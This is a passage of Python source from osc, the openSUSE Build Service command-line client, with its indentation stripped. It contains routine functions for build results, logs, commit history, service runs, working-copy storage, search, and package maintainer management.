# check for simple timeout error and fetch again
if e.code == 502 or e.code == 504:
# re-try result request
continue
root = ET.fromstring(e.read())
if e.code == 400 and kwargs.get('multibuild') and re.search('multibuild', getattr(root.find('summary'), 'text', '')):
kwargs['multibuild'] = None
kwargs['locallink'] = None
continue
raise
root = ET.fromstring(xml)
kwargs['oldstate'] = root.get('state')
for result in root.findall('result'):
if result.get('dirty') is not None:
waiting = True
break
elif result.get('code') in waiting_states:
waiting = True
break
else:
pkg = result.find('status')
if pkg is not None and pkg.get('code') in waiting_states:
waiting = True
break
if not wait or not waiting:
break
else:
yield xml
yield xml
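# Illustrative sketch (not executed; project/package names are made up):
# with wait=True the generator above keeps polling until no result is in a
# transient state, yielding the intermediate xml documents along the way.
#
#   for xml in get_package_results(apiurl, 'home:user:example', 'mypkg', wait=True):
#       for res, is_multi in result_xml_to_dicts(xml):
#           print(res['repository'], res['arch'], res['code'])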
def get_prj_results(apiurl, prj, hide_legend=False, csv=False, status_filter=None, name_filter=None, arch=None, repo=None, vertical=None, show_excluded=None):
#print '----------------------------------------'
global buildstatus_symbols
r = []
f = show_prj_results_meta(apiurl, prj)
root = ET.fromstring(''.join(f))
pacs = []
# sequence of (repo,arch) tuples
targets = []
# {package: {(repo,arch): status}}
status = {}
if root.find('result') == None:
return []
for results in root.findall('result'):
for node in results:
pacs.append(node.get('package'))
pacs = sorted(list(set(pacs)))
for node in root.findall('result'):
# filter architecture and repository
if arch != None and node.get('arch') not in arch:
continue
if repo != None and node.get('repository') not in repo:
continue
if node.get('dirty') == "true":
state = "outdated"
else:
state = node.get('state')
tg = (node.get('repository'), node.get('arch'), state)
targets.append(tg)
for pacnode in node.findall('status'):
pac = pacnode.get('package')
if pac not in status:
status[pac] = {}
status[pac][tg] = pacnode.get('code')
targets.sort()
# filter option
if status_filter or name_filter or not show_excluded:
pacs_to_show = []
targets_to_show = []
#filtering for Package Status
if status_filter:
if status_filter in buildstatus_symbols.values():
# a list is needed because if status_filter == "U"
# we have to filter either an "expansion error" (obsolete)
# or an "unresolvable" state
filters = []
for txt, sym in buildstatus_symbols.items():
if sym == status_filter:
filters.append(txt)
for filt_txt in filters:
for pkg in status.keys():
for repo in status[pkg].keys():
if status[pkg][repo] == filt_txt:
if not name_filter:
pacs_to_show.append(pkg)
targets_to_show.append(repo)
elif name_filter in pkg:
pacs_to_show.append(pkg)
#filtering for Package Name
elif name_filter:
for pkg in pacs:
if name_filter in pkg:
pacs_to_show.append(pkg)
#filter non building states
elif not show_excluded:
enabled = {}
for pkg in status.keys():
showpkg = False
for repo in status[pkg].keys():
if status[pkg][repo] != "excluded":
enabled[repo] = 1
showpkg = True
if showpkg:
pacs_to_show.append(pkg)
targets_to_show = enabled.keys()
pacs = [ i for i in pacs if i in pacs_to_show ]
if len(targets_to_show):
targets = [ i for i in targets if i in targets_to_show ]
# csv output
if csv:
# TODO: option to disable the table header
row = ['_'] + ['/'.join(tg) for tg in targets]
r.append(';'.join(row))
for pac in pacs:
row = [pac] + [status[pac][tg] for tg in targets if tg in status[pac]]
r.append(';'.join(row))
return r
if not vertical:
# human readable output
max_pacs = 40
for startpac in range(0, len(pacs), max_pacs):
offset = 0
for pac in pacs[startpac:startpac+max_pacs]:
r.append(' |' * offset + ' ' + pac)
offset += 1
for tg in targets:
line = []
line.append(' ')
for pac in pacs[startpac:startpac+max_pacs]:
st = ''
if pac not in status or tg not in status[pac]:
# for newly added packages, status may be missing
st = '?'
else:
try:
st = buildstatus_symbols[status[pac][tg]]
except:
print('osc: warn: unknown status \'%s\'...' % status[pac][tg])
print('please edit osc/core.py, and extend the buildstatus_symbols dictionary.')
st = '?'
buildstatus_symbols[status[pac][tg]] = '?'
line.append(st)
line.append(' ')
line.append(' %s %s (%s)' % tg)
line = ''.join(line)
r.append(line)
r.append('')
else:
offset = 0
for tg in targets:
r.append('| ' * offset + '%s %s (%s)'%tg )
offset += 1
for pac in pacs:
line = []
for tg in targets:
st = ''
if pac not in status or tg not in status[pac]:
# for newly added packages, status may be missing
st = '?'
else:
try:
st = buildstatus_symbols[status[pac][tg]]
except:
print('osc: warn: unknown status \'%s\'...' % status[pac][tg])
print('please edit osc/core.py, and extend the buildstatus_symbols dictionary.')
st = '?'
buildstatus_symbols[status[pac][tg]] = '?'
line.append(st)
line.append(' '+pac)
r.append(' '.join(line))
line = []
for i in range(0, len(targets)):
line.append(str(i%10))
r.append(' '.join(line))
r.append('')
if not hide_legend and len(pacs):
r.append(' Legend:')
legend = []
for i, j in buildstatus_symbols.items():
if i == "expansion error":
continue
legend.append('%3s %-20s' % (j, i))
legend.append(' ? buildstatus not available (only new packages)')
if vertical:
for i in range(0, len(targets)):
s = '%1d %s %s (%s)' % (i%10, targets[i][0], targets[i][1], targets[i][2])
if i < len(legend):
legend[i] += s
else:
legend.append(' '*24 + s)
r += legend
return r
def streamfile(url, http_meth = http_GET, bufsize=8192, data=None, progress_obj=None, text=None):
"""
    performs http_meth on url and reads bufsize bytes from the response
    until EOF is reached. After each read, bufsize bytes are yielded to the
    caller. A special usage is bufsize="line" to read the response line by line (text).
"""
cl = ''
retries = 0
# Repeat requests until we get reasonable Content-Length header
# Server (or iChain) is corrupting data at some point, see bnc#656281
while cl == '':
if retries >= int(conf.config['http_retries']):
raise oscerr.OscIOError(None, 'Content-Length is empty for %s, protocol violation' % url)
retries = retries + 1
if retries > 1 and conf.config['http_debug']:
print('\n\nRetry %d --' % (retries - 1), url, file=sys.stderr)
f = http_meth.__call__(url, data = data)
cl = f.info().get('Content-Length')
if cl is not None:
# sometimes the proxy adds the same header again
            # which yields a value like '3495, 3495'
            # use the first of these values (they should all be the same)
cl = cl.split(',')[0]
cl = int(cl)
if progress_obj:
basename = os.path.basename(urlsplit(url)[2])
progress_obj.start(basename=basename, text=text, size=cl)
if bufsize == "line":
bufsize = 8192
xread = f.readline
else:
xread = f.read
read = 0
while True:
data = xread(bufsize)
if not len(data):
break
read += len(data)
if progress_obj:
progress_obj.update(read)
yield data
if progress_obj:
progress_obj.end(read)
f.close()
if not cl is None and read != cl:
raise oscerr.OscIOError(None, 'Content-Length is not matching file size for %s: %i vs %i file size' % (url, cl, read))
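# Illustrative sketch (not executed; url and target path are made up):
# streamfile() yields the response in chunks, so large downloads can be
# written to disk without loading them into memory.
#
#   with open('/tmp/out.bin', 'wb') as dest:
#       for chunk in streamfile('https://api.example.org/some/file', bufsize=8192):
#           dest.write(chunk)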
def buildlog_strip_time(data):
"""Strips the leading build time from the log"""
time_regex = re.compile('^\[[^\]]*\] ', re.M)
return time_regex.sub('', data)
def print_buildlog(apiurl, prj, package, repository, arch, offset=0, strip_time=False, last=False):
"""prints out the buildlog on stdout"""
# to protect us against control characters
import string
all_bytes = string.maketrans('', '')
remove_bytes = all_bytes[:8] + all_bytes[14:32] # accept tabs and newlines
query = {'nostream' : '1', 'start' : '%s' % offset}
if last:
query['last'] = 1
while True:
query['start'] = offset
start_offset = offset
u = makeurl(apiurl, ['build', prj, repository, arch, package, '_log'], query=query)
for data in streamfile(u, bufsize="line"):
offset += len(data)
if strip_time:
data = buildlog_strip_time(data)
sys.stdout.write(data.translate(all_bytes, remove_bytes))
if start_offset == offset:
break
def get_dependson(apiurl, project, repository, arch, packages=None, reverse=None):
query = []
if packages:
for i in packages:
query.append('package=%s' % quote_plus(i))
if reverse:
query.append('view=revpkgnames')
else:
query.append('view=pkgnames')
u = makeurl(apiurl, ['build', project, repository, arch, '_builddepinfo'], query=query)
f = http_GET(u)
return f.read()
def get_buildinfo(apiurl, prj, package, repository, arch, specfile=None, addlist=None, debug=None):
query = []
if addlist:
for i in addlist:
query.append('add=%s' % quote_plus(i))
if debug:
query.append('debug=1')
u = makeurl(apiurl, ['build', prj, repository, arch, package, '_buildinfo'], query=query)
if specfile:
f = http_POST(u, data=specfile)
else:
f = http_GET(u)
return f.read()
def get_buildconfig(apiurl, prj, repository):
u = makeurl(apiurl, ['build', prj, repository, '_buildconfig'])
f = http_GET(u)
return f.read()
def get_worker_info(apiurl, worker):
u = makeurl(apiurl, ['worker', worker])
f = http_GET(u)
return f.read()
def check_constraints(apiurl, prj, repository, arch, package, constraintsfile=None):
query = {'cmd': 'checkconstraints'}
query['project'] = prj
query['package'] = package
query['repository'] = repository
query['arch'] = arch
u = makeurl(apiurl, ['worker'], query)
f = http_POST(u, data=constraintsfile)
root = ET.fromstring(''.join(f))
return [node.get('name') for node in root.findall('entry')]
def get_source_rev(apiurl, project, package, revision=None):
# API supports ?deleted=1&meta=1&rev=4
# but not rev=current,rev=latest,rev=top, or anything like this.
    # CAUTION: We have to loop through all revs and find the highest one, if none is given.
if revision:
url = makeurl(apiurl, ['source', project, package, '_history'], {'rev': revision})
else:
url = makeurl(apiurl, ['source', project, package, '_history'])
f = http_GET(url)
xml = ET.parse(f)
ent = None
for new in xml.findall('revision'):
# remember the newest one.
if not ent:
ent = new
elif ent.find('time').text < new.find('time').text:
ent = new
if not ent:
return { 'version': None, 'error': 'empty revisionlist: no such package?' }
e = {}
for k in ent.keys():
e[k] = ent.get(k)
for k in list(ent):
e[k.tag] = k.text
return e
def get_buildhistory(apiurl, prj, package, repository, arch, format = 'text', limit = None):
import time
query = {}
if limit != None and int(limit) > 0:
query['limit'] = int(limit)
u = makeurl(apiurl, ['build', prj, repository, arch, package, '_history'], query)
f = http_GET(u)
root = ET.parse(f).getroot()
r = []
for node in root.findall('entry'):
rev = node.get('rev')
srcmd5 = node.get('srcmd5')
versrel = node.get('versrel')
bcnt = int(node.get('bcnt'))
duration = node.get('duration')
t = time.gmtime(int(node.get('time')))
t = time.strftime('%Y-%m-%d %H:%M:%S', t)
if duration == None:
duration = ""
if format == 'csv':
r.append('%s|%s|%s|%s.%d|%s' % (t, srcmd5, rev, versrel, bcnt, duration))
else:
bversrel='%s.%d' % (versrel, bcnt)
r.append('%s %s %s %s %s' % (t, srcmd5, bversrel.ljust(16)[:16], rev, duration.rjust(10)))
if format == 'text':
r.insert(0, 'time srcmd5 vers-rel.bcnt rev duration')
return r
def print_jobhistory(apiurl, prj, current_package, repository, arch, format = 'text', limit=20):
import time
query = {}
if current_package:
query['package'] = current_package
if limit != None and int(limit) > 0:
query['limit'] = int(limit)
u = makeurl(apiurl, ['build', prj, repository, arch, '_jobhistory'], query )
f = http_GET(u)
root = ET.parse(f).getroot()
if format == 'text':
print("time package reason code build time worker")
for node in root.findall('jobhist'):
package = node.get('package')
worker = node.get('workerid')
reason = node.get('reason')
if not reason:
reason = "unknown"
code = node.get('code')
st = int(node.get('starttime'))
et = int(node.get('endtime'))
endtime = time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(et))
waittm = et-st
if waittm > 24*60*60:
waitbuild = "%1dd %2dh %2dm %2ds" % (waittm / (24*60*60), (waittm / (60*60)) % 24, (waittm / 60) % 60, waittm % 60)
elif waittm > 60*60:
waitbuild = " %2dh %2dm %2ds" % (waittm / (60*60), (waittm / 60) % 60, waittm % 60)
else:
waitbuild = " %2dm %2ds" % (waittm / 60, waittm % 60)
if format == 'csv':
print('%s|%s|%s|%s|%s|%s' % (endtime, package, reason, code, waitbuild, worker))
else:
print('%s %-50s %-16s %-16s %-16s %-16s' % (endtime, package[0:49], reason[0:15], code[0:15], waitbuild, worker))
def get_commitlog(apiurl, prj, package, revision, format = 'text', meta = False, deleted = False, revision_upper=None):
import time
query = {}
if deleted:
query['deleted'] = 1
if meta:
query['meta'] = 1
u = makeurl(apiurl, ['source', prj, package, '_history'], query)
f = http_GET(u)
root = ET.parse(f).getroot()
r = []
if format == 'xml':
r.append('<?xml version="1.0"?>')
r.append('<log>')
revisions = root.findall('revision')
revisions.reverse()
for node in revisions:
srcmd5 = node.find('srcmd5').text
try:
rev = int(node.get('rev'))
#vrev = int(node.get('vrev')) # what is the meaning of vrev?
try:
if revision is not None and revision_upper is not None:
if rev > int(revision_upper) or rev < int(revision):
continue
elif revision is not None and rev != int(revision):
continue
except ValueError:
if revision != srcmd5:
continue
except ValueError:
# this part should _never_ be reached but...
        return [ 'an unexpected error occurred - please file a bug' ]
version = node.find('version').text
user = node.find('user').text
try:
comment = node.find('comment').text.encode(locale.getpreferredencoding(), 'replace')
except:
comment = '<no message>'
try:
requestid = node.find('requestid').text.encode(locale.getpreferredencoding(), 'replace')
except:
requestid = ""
t = time.gmtime(int(node.find('time').text))
t = time.strftime('%Y-%m-%d %H:%M:%S', t)
if format == 'csv':
s = '%s|%s|%s|%s|%s|%s|%s' % (rev, user, t, srcmd5, version,
comment.replace('\\', '\\\\').replace('\n', '\\n').replace('|', '\\|'), requestid)
r.append(s)
elif format == 'xml':
r.append('<logentry')
r.append(' revision="%s" srcmd5="%s">' % (rev, srcmd5))
r.append('<author>%s</author>' % user)
r.append('<date>%s</date>' % t)
r.append('<requestid>%s</requestid>' % requestid)
r.append('<msg>%s</msg>' %
                      comment.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;'))
r.append('</logentry>')
else:
if requestid:
requestid = "rq" + requestid
s = '-' * 76 + \
'\nr%s | %s | %s | %s | %s | %s\n' % (rev, user, t, srcmd5, version, requestid) + \
'\n' + comment
r.append(s)
if format not in ['csv', 'xml']:
r.append('-' * 76)
if format == 'xml':
r.append('</log>')
return r
def runservice(apiurl, prj, package):
u = makeurl(apiurl, ['source', prj, package], query={'cmd': 'runservice'})
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'could not trigger service run for project \'%s\' package \'%s\'' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def waitservice(apiurl, prj, package):
u = makeurl(apiurl, ['source', prj, package], query={'cmd': 'waitservice'})
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'The service for project \'%s\' package \'%s\' failed' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def mergeservice(apiurl, prj, package):
    # first wait for the service to finish and make sure it did not fail
waitservice(apiurl, prj, package)
# real merge
u = makeurl(apiurl, ['source', prj, package], query={'cmd': 'mergeservice'})
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'could not merge service files in project \'%s\' package \'%s\'' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def rebuild(apiurl, prj, package, repo, arch, code=None):
query = { 'cmd': 'rebuild' }
if package:
query['package'] = package
if repo:
query['repository'] = repo
if arch:
query['arch'] = arch
if code:
query['code'] = code
u = makeurl(apiurl, ['build', prj], query=query)
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'could not trigger rebuild for project \'%s\' package \'%s\'' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def store_read_project(dir):
global store
try:
p = open(os.path.join(dir, store, '_project')).readlines()[0].strip()
except IOError:
msg = 'Error: \'%s\' is not an osc project dir or working copy' % os.path.abspath(dir)
if os.path.exists(os.path.join(dir, '.svn')):
msg += '\nTry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
return p
def store_read_package(dir):
global store
try:
p = open(os.path.join(dir, store, '_package')).readlines()[0].strip()
except IOError:
msg = 'Error: \'%s\' is not an osc package working copy' % os.path.abspath(dir)
if os.path.exists(os.path.join(dir, '.svn')):
msg += '\nTry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
return p
def store_read_apiurl(dir, defaulturl=True):
global store
fname = os.path.join(dir, store, '_apiurl')
try:
url = open(fname).readlines()[0].strip()
# this is needed to get a proper apiurl
        # (former osc versions may have stored an apiurl with a trailing slash etc.)
apiurl = conf.urljoin(*conf.parse_apisrv_url(None, url))
except:
if not defaulturl:
if is_project_dir(dir):
project = store_read_project(dir)
package = None
elif is_package_dir(dir):
project = store_read_project(dir)
package = None
else:
msg = 'Error: \'%s\' is not an osc package working copy' % os.path.abspath(dir)
raise oscerr.NoWorkingCopy(msg)
msg = 'Your working copy \'%s\' is in an inconsistent state.\n' \
'Please run \'osc repairwc %s\' (Note this might _remove_\n' \
'files from the .osc/ dir). Please check the state\n' \
'of the working copy afterwards (via \'osc status %s\')' % (dir, dir, dir)
raise oscerr.WorkingCopyInconsistent(project, package, ['_apiurl'], msg)
apiurl = conf.config['apiurl']
return apiurl
def store_write_string(dir, file, string, subdir=''):
global store
if subdir and not os.path.isdir(os.path.join(dir, store, subdir)):
os.mkdir(os.path.join(dir, store, subdir))
fname = os.path.join(dir, store, subdir, file)
try:
f = open(fname + '.new', 'w')
f.write(string)
f.close()
os.rename(fname + '.new', fname)
except:
if os.path.exists(fname + '.new'):
os.unlink(fname + '.new')
raise
def store_write_project(dir, project):
store_write_string(dir, '_project', project + '\n')
def store_write_apiurl(dir, apiurl):
store_write_string(dir, '_apiurl', apiurl + '\n')
def store_unlink_file(dir, file):
global store
try: os.unlink(os.path.join(dir, store, file))
except: pass
def store_read_file(dir, file):
global store
try:
content = open(os.path.join(dir, store, file)).read()
return content
except:
return None
def store_write_initial_packages(dir, project, subelements):
global store
fname = os.path.join(dir, store, '_packages')
root = ET.Element('project', name=project)
for elem in subelements:
root.append(elem)
ET.ElementTree(root).write(fname)
def get_osc_version():
return __version__
def abortbuild(apiurl, project, package=None, arch=None, repo=None):
return cmdbuild(apiurl, 'abortbuild', project, package, arch, repo)
def restartbuild(apiurl, project, package=None, arch=None, repo=None):
return cmdbuild(apiurl, 'restartbuild', project, package, arch, repo)
def unpublish(apiurl, project, package=None, arch=None, repo=None, code=None):
return cmdbuild(apiurl, 'unpublish', project, package, arch, repo, code)
def wipebinaries(apiurl, project, package=None, arch=None, repo=None, code=None):
return cmdbuild(apiurl, 'wipe', project, package, arch, repo, code)
def cmdbuild(apiurl, cmd, project, package=None, arch=None, repo=None, code=None):
query = { 'cmd': cmd }
if package:
query['package'] = package
if arch:
query['arch'] = arch
if repo:
query['repository'] = repo
if code:
query['code'] = code
u = makeurl(apiurl, ['build', project], query)
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = '%s command failed for project %s' % (cmd, project)
if package:
e.osc_msg += ' package %s' % package
if arch:
e.osc_msg += ' arch %s' % arch
if repo:
e.osc_msg += ' repository %s' % repo
if code:
e.osc_msg += ' code=%s' % code
raise
root = ET.parse(f).getroot()
return root.get('code')
def parseRevisionOption(string):
"""
returns a tuple which contains the revisions
"""
if string:
if ':' in string:
splitted_rev = string.split(':')
try:
for i in splitted_rev:
int(i)
return splitted_rev
except ValueError:
print('your revision \'%s\' will be ignored' % string, file=sys.stderr)
return None, None
else:
if string.isdigit():
return string, None
elif string.isalnum() and len(string) == 32:
# could be an md5sum
return string, None
else:
print('your revision \'%s\' will be ignored' % string, file=sys.stderr)
return None, None
else:
return None, None
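# Illustrative sketch (not executed): the accepted forms of a revision option.
#
#   parseRevisionOption('3')      # -> ('3', None)
#   parseRevisionOption('3:7')    # -> ['3', '7']
#   parseRevisionOption('junk!')  # prints a warning and returns (None, None)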
def checkRevision(prj, pac, revision, apiurl=None, meta=False):
"""
    check if revision is a valid revision, i.e. it is not
    larger than the upstream revision id
"""
if len(revision) == 32:
# there isn't a way to check this kind of revision for validity
return True
if not apiurl:
apiurl = conf.config['apiurl']
try:
if int(revision) > int(show_upstream_rev(apiurl, prj, pac, meta)) \
or int(revision) <= 0:
return False
else:
return True
except (ValueError, TypeError):
return False
def build_table(col_num, data = [], headline = [], width=1, csv = False):
"""
This method builds a simple table.
Example1: build_table(2, ['foo', 'bar', 'suse', 'osc'], ['col1', 'col2'], 2)
col1 col2
foo bar
suse osc
"""
longest_col = []
for i in range(col_num):
longest_col.append(0)
if headline and not csv:
data[0:0] = headline
# find longest entry in each column
i = 0
for itm in data:
if longest_col[i] < len(itm):
longest_col[i] = len(itm)
if i == col_num - 1:
i = 0
else:
i += 1
# calculate length for each column
for i, row in enumerate(longest_col):
longest_col[i] = row + width
# build rows
row = []
table = []
i = 0
for itm in data:
if i % col_num == 0:
i = 0
row = []
table.append(row)
# there is no need to justify the entries of the last column
# or when generating csv
if i == col_num -1 or csv:
row.append(itm)
else:
row.append(itm.ljust(longest_col[i]))
i += 1
if csv:
separator = '|'
else:
separator = ''
return [separator.join(row) for row in table]
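# Illustrative sketch (not executed): csv mode skips the headline and joins
# the columns with '|' instead of justifying them.
#
#   build_table(2, ['foo', 'bar', 'suse', 'osc'], ['col1', 'col2'], csv=True)
#   # -> ['foo|bar', 'suse|osc']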
def xpath_join(expr, new_expr, op='or', inner=False, nexpr_parentheses=False):
"""
    Join two xpath expressions. If inner is False expr will
    be surrounded with parentheses (unless it is already
    surrounded). If nexpr_parentheses is True new_expr will be
surrounded with parentheses.
"""
if not expr:
return new_expr
elif not new_expr:
return expr
    # NOTE: this is not a real syntax check (e.g. if a literal contains a '(' or ')'
    # the heuristic below may guess wrong and expr may or may not get parenthesized)
parentheses = not inner
if not inner and expr.startswith('(') and expr.endswith(')'):
parentheses = False
braces = [i for i in expr if i == '(' or i == ')']
closed = 0
while len(braces):
if braces.pop() == ')':
closed += 1
continue
else:
closed += -1
while len(braces):
if braces.pop() == '(':
closed += -1
else:
closed += 1
if closed != 0:
parentheses = True
break
if parentheses:
expr = '(%s)' % expr
if nexpr_parentheses:
new_expr = '(%s)' % new_expr
return '%s %s %s' % (expr, op, new_expr)
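# Illustrative sketch (not executed): incrementally building an xpath match.
#
#   xp = xpath_join("@name = 'foo'", "@project = 'bar'", op='and')
#   # -> "(@name = 'foo') and @project = 'bar'"
#   xp = xpath_join(xp, "starts-with(@arch, 'x86')", op='and', nexpr_parentheses=True)
#   # -> "((@name = 'foo') and @project = 'bar') and (starts-with(@arch, 'x86'))"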
def search(apiurl, queries=None, **kwargs):
"""
Perform a search request. The requests are constructed as follows:
kwargs = {'kind1' => xpath1, 'kind2' => xpath2, ..., 'kindN' => xpathN}
GET /search/kind1?match=xpath1
...
GET /search/kindN?match=xpathN
queries is a dict of optional http query parameters, which are passed
to the makeurl call, of the form
    {kind_1: dict_or_list, ..., kind_N: dict_or_list},
    where kind_1 to kind_N are keys of kwargs.
"""
if queries is None:
queries = {}
res = {}
for urlpath, xpath in kwargs.items():
path = [ 'search' ]
        path += urlpath.split('_') # FIXME: take underscores as path separators. I see no other way atm to fix OBS api calls without breaking the osc api
query = queries.get(urlpath, {})
query['match'] = xpath
u = makeurl(apiurl, path, query)
f = http_GET(u)
res[urlpath] = ET.parse(f).getroot()
return res
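# Illustrative sketch (not executed; the xpaths are made up): one GET request
# per keyword argument is issued against /search/<kind>.
#
#   res = search(apiurl, package="@name = 'osc'", project="@name = 'devel:tools'")
#   # res['package'] / res['project'] are the parsed roots of
#   # /search/package?match=... and /search/project?match=...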
def owner(apiurl, binary, mode="binary", attribute=None, project=None, usefilter=None, devel=None, limit=None):
"""
Perform a binary package owner search. This is supported since OBS 2.4.
"""
# find default project, if not specified
query = { mode: binary }
if attribute:
query['attribute'] = attribute
if project:
query['project'] = project
if devel:
query['devel'] = devel
if limit != None:
query['limit'] = limit
if usefilter != None:
query['filter'] = ",".join(usefilter)
u = makeurl(apiurl, [ 'search', 'owner' ], query)
res = None
try:
f = http_GET(u)
res = ET.parse(f).getroot()
except HTTPError as e:
# old server not supporting this search
pass
return res
def set_link_rev(apiurl, project, package, revision='', expand=False):
url = makeurl(apiurl, ['source', project, package, '_link'])
try:
f = http_GET(url)
root = ET.parse(f).getroot()
except HTTPError as e:
e.osc_msg = 'Unable to get _link file in package \'%s\' for project \'%s\'' % (package, project)
raise
revision = _set_link_rev(apiurl, project, package, root, revision, expand=expand)
l = ET.tostring(root, encoding=ET_ENCODING)
http_PUT(url, data=l)
return revision
def _set_link_rev(apiurl, project, package, root, revision='', expand=False):
"""
    Updates the rev attribute of the _link xml. If revision is set to None
    the rev and vrev attributes are removed from the _link xml. If revision
    is the empty string the latest rev of the link's source package is used
    (or the xsrcmd5 if expand is True). If revision is neither None nor the
    empty string the _link's rev attribute is set to this revision (or to
    the xsrcmd5 if expand is True).
"""
src_project = root.get('project', project)
src_package = root.get('package', package)
vrev = None
if revision is None:
if 'rev' in root.keys():
del root.attrib['rev']
if 'vrev' in root.keys():
del root.attrib['vrev']
elif not revision or expand:
revision, vrev = show_upstream_rev_vrev(apiurl, src_project, src_package, revision=revision, expand=expand)
if revision:
root.set('rev', revision)
# add vrev when revision is a srcmd5
if vrev is not None and revision is not None and len(revision) >= 32:
root.set('vrev', vrev)
return revision
def delete_dir(dir):
# small security checks
if os.path.islink(dir):
raise oscerr.OscIOError(None, 'cannot remove linked dir')
elif os.path.abspath(dir) == '/':
raise oscerr.OscIOError(None, 'cannot remove \'/\'')
for dirpath, dirnames, filenames in os.walk(dir, topdown=False):
for filename in filenames:
os.unlink(os.path.join(dirpath, filename))
for dirname in dirnames:
os.rmdir(os.path.join(dirpath, dirname))
os.rmdir(dir)
def delete_storedir(store_dir):
"""
This method deletes a store dir.
"""
head, tail = os.path.split(store_dir)
if tail == '.osc':
delete_dir(store_dir)
def unpack_srcrpm(srpm, dir, *files):
"""
This method unpacks the passed srpm into the
passed dir. If arguments are passed to the \'files\' tuple
    only these files will be unpacked.
"""
if not is_srcrpm(srpm):
print('error - \'%s\' is not a source rpm.' % srpm, file=sys.stderr)
sys.exit(1)
curdir = os.getcwd()
if os.path.isdir(dir):
os.chdir(dir)
cmd = 'rpm2cpio %s | cpio -i %s &> /dev/null' % (srpm, ' '.join(files))
ret = run_external(cmd, shell=True)
if ret != 0:
print('error \'%s\' - cannot extract \'%s\'' % (ret, srpm), file=sys.stderr)
sys.exit(1)
os.chdir(curdir)
def is_rpm(f):
"""check if the named file is an RPM package"""
try:
h = open(f, 'rb').read(4)
except:
return False
if h == '\xed\xab\xee\xdb':
return True
else:
return False
def is_srcrpm(f):
"""check if the named file is a source RPM"""
if not is_rpm(f):
return False
try:
h = open(f, 'rb').read(8)
except:
return False
if h[7] == '\x01':
return True
else:
return False
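# Illustrative sketch (not executed; file paths are made up): both helpers
# only inspect the leading bytes of the file.
#
#   is_rpm('/tmp/foo-1.0-1.x86_64.rpm')   # True for any rpm package
#   is_srcrpm('/tmp/foo-1.0-1.src.rpm')   # True only if the rpm is a source rpm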
def addMaintainer(apiurl, prj, pac, user):
# for backward compatibility only
addPerson(apiurl, prj, pac, user)
def addPerson(apiurl, prj, pac, user, role="maintainer"):
""" add a new person to a package or project """
path = quote_plus(prj),
kind = 'prj'
if pac:
path = path + (quote_plus(pac),)
kind = 'pkg'
data = meta_exists(metatype=kind,
path_args=path,
template_args=None,
create_new=False)
if data and get_user_meta(apiurl, user) != None:
root = ET.fromstring(''.join(data))
found = False
for person in root.getiterator('person'):
if person.get('userid') == user and person.get('role') == role:
found = True
print("user already exists")
break
if not found:
# the xml has a fixed structure
root.insert(2, ET.Element('person', role=role, userid=user))
print('user \'%s\' added to \'%s\'' % (user, pac or prj))
edit_meta(metatype=kind,
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
else:
        print("osc: an error occurred")
def delMaintainer(apiurl, prj, pac, user):
# for backward compatibility only
delPerson(apiurl, prj, pac, user)
def delPerson(apiurl, prj, pac, user, role="maintainer"):
""" delete a person from a package or project """
path = quote_plus(prj),
kind = 'prj'
if pac:
path = path + (quote_plus(pac), )
kind = 'pkg'
data = meta_exists(metatype=kind,
path_args=path,
template_args=None,
create_new=False)
if data and get_user_meta(apiurl, user) != None:
root = ET.fromstring(''.join(data))
found = False
for person in root.getiterator('person'):
if person.get('userid') == user and person.get('role') == role:
root.remove(person)
found = True
print("user \'%s\' removed" % user)
if found:
edit_meta(metatype=kind,
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
else:
print("user \'%s\' not found in \'%s\'" % (user, pac or prj))
else:
        print("an error occurred")
def setBugowner(apiurl, prj, pac, user=None, group=None):
""" delete all bugowners (user and group entries) and set one new one in a package or project """
path = quote_plus(prj),
kind = 'prj'
if pac:
path = path + (quote_plus(pac), )
kind = 'pkg'
data = meta_exists(metatype=kind,
path_args=path,
template_args=None,
create_new=False)
if user.startswith('group:'):
group=user.replace('group:', '')
user=None
if data:
root = ET.fromstring(''.join(data))
for group_element in root.getiterator('group'):
if group_element.get('role') == "bugowner":
root.remove(group_element)
for person_element in root.getiterator('person'):
if person_element.get('role') == "bugowner":
root.remove(person_element)
if user:
root.insert(2, ET.Element('person', role='bugowner', userid=user))
elif group:
root.insert(2, ET.Element('group', role='bugowner', groupid=group))
else:
print("Neither user nor group is specified")
edit_meta(metatype=kind,
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
def setDevelProject(apiurl, prj, pac, dprj, dpkg=None):
    """ set the <devel project="..."> element in the package metadata """
path = (quote_plus(prj),) + (quote_plus(pac),)
data = meta_exists(metatype='pkg',
path_args=path,
template_args=None,
create_new=False)
if data and show_project_meta(apiurl, dprj) != None:
root = ET.fromstring(''.join(data))
        if root.find('devel') is None:
ET.SubElement(root, 'devel')
elem = root.find('devel')
if dprj:
elem.set('project', dprj)
else:
if 'project' in elem.keys():
del elem.attrib['project']
if dpkg:
elem.set('package', dpkg)
else:
if 'package' in elem.keys():
del elem.attrib['package']
edit_meta(metatype='pkg',
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
else:
        print("osc: an error occurred")
def createPackageDir(pathname, prj_obj=None):
"""
create and initialize a new package dir in the given project.
prj_obj can be a Project() instance.
"""
prj_dir, pac_dir = getPrjPacPaths(pathname)
if is_project_dir(prj_dir):
global store
if not os.path.exists(os.path.join(pathname, store)):
prj = prj_obj or Project(prj_dir, False)
Package.init_package(prj.apiurl, prj.name, pac_dir, pathname)
prj.addPackage(pac_dir)
print(statfrmt('A', os.path.normpath(pathname)))
else:
raise oscerr.OscIOError(None, 'file or directory \'%s\' already exists' % pathname)
else:
msg = '\'%s\' is not a working copy' % prj_dir
if os.path.exists(os.path.join(prj_dir, '.svn')):
msg += '\ntry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
